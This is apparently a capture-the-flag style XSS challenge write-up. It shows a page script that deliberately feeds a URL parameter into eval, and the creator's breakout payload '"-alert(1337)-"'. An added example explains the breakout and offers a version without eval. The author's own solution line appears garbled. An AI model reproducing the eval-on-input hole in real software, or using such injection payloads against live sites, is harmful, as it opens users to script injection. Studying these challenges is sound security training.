
[XSSG] Jefff

Challenge

This is the script that violates the web

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

Solution

In this challenge the code calls eval, a function that evaluates JavaScript code represented as a string. So we have to escape that function somehow; I’ve escaped it using "-example-"

Ma name JEFFF

Creator solution

The solution given by the creator of the game is as follows

"-alert(1337)-"
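
Why this input is executed, as an added example (not code from the original post or from the challenge author): the quotes in `jeff` close the string literal inside the text handed to eval, so the remainder is parsed as code. The function names and the stubbed `alert` are assumptions made so the snippet runs under Node.js; the hardened form drops eval and treats the parameter as data only.

```javascript
// Source text the challenge passes to eval for a given `jeff` value.
function evalSource(jeff) {
  return `ma = "Ma name ${jeff}"`;
}

// Vulnerable form, same logic as the challenge script.
// `alert` is a local stub (assumption) that records calls, so we can
// observe whether the parameter was executed instead of displayed.
function vulnerable(jeff) {
  const calls = [];
  const alert = (x) => { calls.push(x); };
  let ma = "";
  eval(evalSource(jeff)); // direct eval: sees `ma` and `alert` above
  return { ma, calls };
}

// Hardened form: no eval, the parameter never becomes source text.
// In the page the result would be assigned with innerText/textContent.
function hardened(search) {
  const jeff = new URLSearchParams(search).get("jeff") || "JEFFF";
  return `Ma name ${jeff}`;
}

// Constructed sample inputs: the default value and the creator's solution.
const benign = vulnerable("JEFFF");
const breakout = vulnerable('"-alert(1337)-"');

console.log(evalSource('"-alert(1337)-"')); // text eval actually parses
console.log(benign.ma, benign.calls);       // plain string, no call made
console.log(breakout.ma, breakout.calls);   // string arithmetic plus a call
console.log(hardened("?jeff=%22-alert(1337)-%22")); // shown as text
```

In the vulnerable form the two subtractions turn the call into an operand of the assignment, which is why the heading ends up showing a number-conversion result rather than the name.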

This post is licensed under CC BY 4.0 by the author.